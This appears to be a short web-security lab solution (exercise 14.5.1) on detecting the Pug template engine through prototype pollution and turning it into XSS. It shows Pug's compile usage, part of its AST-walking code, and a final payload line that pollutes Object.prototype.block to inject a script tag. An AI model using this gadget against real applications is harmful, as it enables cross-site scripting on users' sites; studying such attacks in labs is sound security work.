14.5.1
Switch to the Pug templating engine. Discover a mechanism to detect if the target is running Pug using prototype pollution. Using this mechanism, obtain XSS against the target.
Solution
- https://blog.p6.is/AST-Injection/#Pug
- A common way to use a template in a pug is as below.
- The pug.compile function converts a string into a template function and passes the object for reference.
const pug = require('pug');
const source = `h1= msg`;
var fn = pug.compile(source);
var html = fn({msg: 'It works'});
console.log(html); // <h1>It works</h1>\
switch (ast.type) {
case 'NamedBlock':
case 'Block':
ast.nodes = walkAndMergeNodes(ast.nodes);
break;
case 'Case':
case 'Filter':
case 'Mixin':
case 'Tag':
case 'InterpolatedTag':
case 'When':
case 'Code':
case 'While':
if (ast.block) {
ast.block = walkAST(ast.block, before, after, options);
}
break;
...
Object.prototype.block = {"type":"Text","val":`<script>alert(origin)</script>`};